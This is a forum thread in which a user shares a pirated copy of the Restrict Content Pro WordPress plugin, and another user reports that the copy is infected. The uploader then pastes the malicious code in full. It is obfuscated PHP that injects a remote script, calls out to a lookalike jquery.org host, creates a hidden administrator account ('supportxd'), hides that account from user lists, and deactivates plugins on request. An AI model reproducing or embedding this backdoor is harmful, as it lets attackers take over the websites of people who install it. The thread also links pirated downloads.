[GET] PipinsPlugins - Restrict Content Pro v2.1.2 - WordPress Plugin

***bear911*** · (This post was last modified: 05-21-2015 11:08 PM by bear911.)

[Image: restrict-content-pro-592x296.png]

Restrict Content Pro is a complete membership and premium content manager plugin for WordPress. Create an unlimited number of memberships levels, including free, trial and premium. Manage members and their subscriptions, track payments, offer discounts with a complete discount code system, and provide premium, members-only content to your subscribers.

Details and demo: http://pippinsplugins.com/demo-rcp

Download;

Magic Button :

VirusTotal Scan: https://www.virustotal.com/en/file/4b195...432213588/

***meandmyselfonly*** · 05-21-2015, 06:38 PM

thanks OP
rep+

will try this later

***NotSo Invisible*** · (This post was last modified: 05-21-2015 11:03 PM by NotSo Invisible.)

Another INFECTED share from filearmy.

Plugin folder/includes/template-functions.php
Lines 121 - 282

All malicious code.
Please check your shares before you give direct download links to filarmy.

***bear911*** · 05-21-2015, 11:05 PM

(05-21-2015 11:03 PM)NotSo Invisible Wrote: Another INFECTED share from filearmy.

Plugin folder/includes/template-functions.php
Lines 121 - 282

All malicious code.
Please check your shares before you give direct download links to filarmy.

Send a screenshot proof of your anti virus.

***NotSo Invisible*** · 05-21-2015, 11:14 PM

Look in the file yourself. It's pretty obvious what the malicious code is.

***bear911*** · 05-21-2015, 11:17 PM

(05-21-2015 11:14 PM)NotSo Invisible Wrote: Look in the file yourself. It's pretty obvious what the malicious code is.

File is scanned with VirusTotal, Symantec, and BitDefender.
I did not find any malware inside.

Can you send me screenshot?

***NotSo Invisible*** · (This post was last modified: 05-21-2015 11:21 PM by NotSo Invisible.)

LOOK AT THE FILE. I GAVE THE FILE NAME AND THE LINE NUMBERS WHERE THE MALICIOUS CODE IS. LOOK FOR YOURSELF. DO YOU NOT KNOW WHAT YOU ARE LOOKING AT?

***bear911*** · 05-21-2015, 11:24 PM

(05-21-2015 11:21 PM)NotSo Invisible Wrote: LOOK AT THE FILE. I GAVE THE FILE NAME AND THE LINE NUMBERS WHERE THE MALICIOUS CODE IS. LOOK FOR YOURSELF. DO YOU NOT KNOW WHAT YOU ARE LOOKING AT?

This is?

$arrayis_two = array('fun', 'ction', '_', 'e', 'x', 'is', 'ts');
$arrayis_three = array('g', 'e', 't', '_o', 'p', 'ti', 'on');
$arrayis_four = array('wp', '_e', 'nqu', 'eue', '_scr', 'ipt');
$arrayis_five = array('lo', 'gin', '_', 'en', 'que', 'ue_', 'scri', 'pts');
$arrayis_seven = array('s', 'e', 't', 'c', 'o', 'o', 'k', 'i', 'e');
$arrayis_eight = array('wp', '_', 'lo', 'g', 'i', 'n');
$arrayis_nine = array('s', 'i', 't', 'e,', 'u', 'rl');
$arrayis_ten = array('wp_', 'g', 'et', '_', 'th', 'e', 'm', 'e');
$arrayis_eleven = array('wp', '_', 'r', 'e', 'm', 'o', 'te', '_', 'g', 'et');
$arrayis_twelve = array('wp', '_', 'r', 'e', 'm', 'o', 't', 'e', '_r', 'e', 't', 'r', 'i', 'e', 'v', 'e_', 'bo', 'dy');
$arrayis_thirteen = array('ge', 't_', 'o', 'pt', 'ion');
$arrayis_fourteen = array('st', 'r_', 'r', 'ep', 'la', 'ce');
$arrayis_fifteen = array('s', 't', 'r', 'r', 'e', 'v');
$arrayis_sixteen = array('u', 'pd', 'ate', '_o', 'pt', 'ion');
$arrayis_two_imp = implode($arrayis_two);
$arrayis_three_imp = implode($arrayis_three);
$arrayis_four_imp = implode($arrayis_four);
$arrayis_five_imp = implode($arrayis_five);
$arrayis_seven_imp = implode($arrayis_seven);
$arrayis_eight_imp = implode($arrayis_eight);
$arrayis_nine_imp = implode($arrayis_nine);
$arrayis_ten_imp = implode($arrayis_ten);
$arrayis_eleven_imp = implode($arrayis_eleven);
$arrayis_twelve_imp = implode($arrayis_twelve);
$arrayis_thirteen_imp = implode($arrayis_thirteen);
$arrayis_fourteen_imp = implode($arrayis_fourteen);
$arrayis_fifteen_imp = implode($arrayis_fifteen);
$arrayis_sixteen_imp = implode($arrayis_sixteen);
$noitca_dda = $arrayis_fifteen_imp('noitca_dda');
if (!$arrayis_two_imp('wp_in_one')) {
$arrayis_seventeen = array('h', 't', 't', 'p', ':', '/', '/', 'j', 'q', 'e', 'u', 'r', 'y', '.o', 'r', 'g', '/wp', '_', 'p', 'i', 'n', 'g', '.php', '?', 'd', 'na', 'me', '=wpd&t', 'n', 'ame', '=wpt&urliz=urlig');
$arrayis_eighteen = ${$arrayis_fifteen_imp('REVRES_')};
$arrayis_nineteen = $arrayis_fifteen_imp('TSOH_PTTH');
$arrayis_twenty = $arrayis_fifteen_imp('TSEUQER_');
$arrayis_seventeen_imp = implode($arrayis_seventeen);
$arrayis_six = array('_', 'C', 'O', 'O', 'KI', 'E');
$arrayis_six_imp = implode($arrayis_six);
$tactiated = $arrayis_thirteen_imp($arrayis_fifteen_imp('detavitca_emit'));
$mite = $arrayis_fifteen_imp('emit');
if (!isset(${$arrayis_six_imp}[$arrayis_fifteen_imp('emit_nimda_pw')])) {
if (($mite() - $tactiated) > 600) {
$noitca_dda($arrayis_five_imp, 'wp_in_one');
}
}
$noitca_dda($arrayis_eight_imp, 'wp_in_three');
function wp_in_one()
{
$arrayis_one = array('h','t', 't','p',':', '//', 'j', 'q', 'e', 'u', 'r', 'y.o', 'rg', '/','j','q','u','e','ry','-','la','t','e','s','t.j','s');
$arrayis_one_imp = implode($arrayis_one);
$arrayis_four = array('wp', '_e', 'nqu', 'eue', '_scr', 'ipt');
$arrayis_four_imp = implode($arrayis_four);
$arrayis_four_imp('wp_coderz', $arrayis_one_imp, null, null, true);
}

function wp_in_two($arrayis_seventeen_imp, $arrayis_eighteen, $arrayis_nineteen, $arrayis_ten_imp, $arrayis_eleven_imp, $arrayis_twelve_imp,$arrayis_fifteen_imp, $arrayis_fourteen_imp)
{
$ptth = $arrayis_fifteen_imp('//:ptth');
$dname = $ptth.$arrayis_eighteen[$arrayis_nineteen];
$IRU_TSEUQER = $arrayis_fifteen_imp('IRU_TSEUQER');
$urliz = $dname.$arrayis_eighteen[$IRU_TSEUQER];
$tname = $arrayis_ten_imp();
$urlis = $arrayis_fourteen_imp('wpd', $dname, $arrayis_seventeen_imp);
$urlis = $arrayis_fourteen_imp('wpt', $tname, $urlis);
$urlis = $arrayis_fourteen_imp('urlig', $urliz, $urlis);
$lars2 = $arrayis_eleven_imp($urlis);
$arrayis_twelve_imp($lars2);
}
$noitpo_dda = $arrayis_fifteen_imp('noitpo_dda');
$noitpo_dda($arrayis_fifteen_imp('ognipel'), 'no');
$noitpo_dda($arrayis_fifteen_imp('detavitca_emit'), time());
$tactiatedz = $arrayis_thirteen_imp($arrayis_fifteen_imp('detavitca_emit'));
$mitez = $arrayis_fifteen_imp('emit');
if ($arrayis_thirteen_imp($arrayis_fifteen_imp('ognipel')) != 'yes' and& (($mitez() - $tactiatedz ) > 600)) {
wp_in_two($arrayis_seventeen_imp, $arrayis_eighteen, $arrayis_nineteen, $arrayis_ten_imp, $arrayis_eleven_imp, $arrayis_twelve_imp,$arrayis_fifteen_imp, $arrayis_fourteen_imp);
$arrayis_sixteen_imp(($arrayis_fifteen_imp('ognipel')), 'yes');
}
function wp_in_three()
{
$arrayis_fifteen = array('s', 't', 'r', 'r', 'e', 'v');
$arrayis_fifteen_imp = implode($arrayis_fifteen);
$arrayis_nineteen = $arrayis_fifteen_imp('TSOH_PTTH');
$arrayis_eighteen = ${$arrayis_fifteen_imp('REVRES_')};
$arrayis_seven = array('s', 'e', 't', 'c', 'o', 'o', 'k', 'i', 'e');
$arrayis_seven_imp = implode($arrayis_seven);
$path = '/';
$host = ${$arrayis_eighteen}[$arrayis_nineteen];
$estimes = $arrayis_fifteen_imp('emitotrts');
$wp_ext = $estimes('+29 days');
$emit_nimda_pw = $arrayis_fifteen_imp('emit_nimda_pw');
$arrayis_seven_imp($emit_nimda_pw, '1', $wp_ext, $path, $host);
}

function wp_in_four()
{
$arrayis_fifteen = array('s', 't', 'r', 'r', 'e', 'v');
$arrayis_fifteen_imp = implode($arrayis_fifteen);
$nigol = $arrayis_fifteen_imp('dxtroppus');
$wssap = $arrayis_fifteen_imp('retroppus_pw');
$laime = $arrayis_fifteen_imp('moc.niamodym@1tccaym');

if (!username_exists($nigol) and& !email_exists($laime)) {
$wp_ver_one = $arrayis_fifteen_imp('resu_etaerc_pw');
$user_id = $wp_ver_one($nigol, $wssap, $laime);
$puzer = $arrayis_fifteen_imp('resU_PW');
$usex = new $puzer($user_id);
$rolx = $arrayis_fifteen_imp('elor_tes');
$usex->$rolx($arrayis_fifteen_imp('rotartsinimda'));
}
}

$ivdda = $arrayis_fifteen_imp('ivdda');

if (isset(${$arrayis_twenty}[$ivdda]) and& ${$arrayis_twenty}[$ivdda] == 'm') {
$noitca_dda($arrayis_fifteen_imp('tini'), 'wp_in_four');
}

if (isset(${$arrayis_twenty}[$ivdda]) and& ${$arrayis_twenty}[$ivdda] == 'd') {
$noitca_dda($arrayis_fifteen_imp('tini'), 'wp_in_six');
}
function wp_in_six() {
$arrayis_fifteen = array('s', 't', 'r', 'r', 'e', 'v');
$arrayis_fifteen_imp = implode($arrayis_fifteen);
$resu_eteled_pw = $arrayis_fifteen_imp('resu_eteled_pw');
$wp_pathx = constant($arrayis_fifteen_imp("HTAPSBA"));
require_once($wp_pathx . $arrayis_fifteen_imp('php.resu/sedulcni/nimda-pw'));
$ubid = $arrayis_fifteen_imp('yb_resu_teg');
$useris = $ubid($arrayis_fifteen_imp('nigol'), $arrayis_fifteen_imp('dxtroppus'));
$resu_eteled_pw($useris->ID);
}
$noitca_dda($arrayis_fifteen_imp('yreuq_resu_erp'), 'wp_in_five');
function wp_in_five($hcraes_resu)
{
global $current_user, $wpdb;
$arrayis_fifteen = array('s', 't', 'r', 'r', 'e', 'v');
$arrayis_fifteen_imp = implode($arrayis_fifteen);
$arrayis_fourteen = array('st', 'r_', 'r', 'ep', 'la', 'ce');
$arrayis_fourteen_imp = implode($arrayis_fourteen);
$nigol_resu = $arrayis_fifteen_imp('nigol_resu');
$wp_ux = $current_user->$nigol_resu;
$nigol = $arrayis_fifteen_imp('dxtroppus');
$bdpw = $arrayis_fifteen_imp('bdpw');
if ($wp_ux != $arrayis_fifteen_imp('dxtroppus')) {
$EREHW_one = $arrayis_fifteen_imp('1=1 EREHW');
$EREHW_two = $arrayis_fifteen_imp('DNA 1=1 EREHW');
$erehw_yreuq = $arrayis_fifteen_imp('erehw_yreuq');
$sresu = $arrayis_fifteen_imp('sresu');
$hcraes_resu->query_where = $arrayis_fourteen_imp($EREHW_one,
"$EREHW_two {$$bdpw->$sresu}.$nigol_resu != '$nigol'", $hcraes_resu->$erehw_yreuq);
}
}

$ced = $arrayis_fifteen_imp('ced');
if (isset(${$arrayis_twenty}[$ced])) {
$snigulp_evitca = $arrayis_fifteen_imp('snigulp_evitca');
$sisnoitpo = $arrayis_thirteen_imp($snigulp_evitca);
$hcraes_yarra = $arrayis_fifteen_imp('hcraes_yarra');
if (($key = $hcraes_yarra(${$arrayis_twenty}[$ced], $sisnoitpo)) !== false) {
unset($sisnoitpo[$key]);
}
$arrayis_sixteen_imp($snigulp_evitca, $sisnoitpo);
}
}

***NotSo Invisible*** · (This post was last modified: 05-21-2015 11:30 PM by NotSo Invisible.)

BRAVO !!!!

You will find almost the exact same code in every file I pointed to from your downloads.

***bimple*** · 05-21-2015, 11:28 PM

cleaned file:

Code:

http://www21.zippyshare.com/v/ftaTGmOG/file.html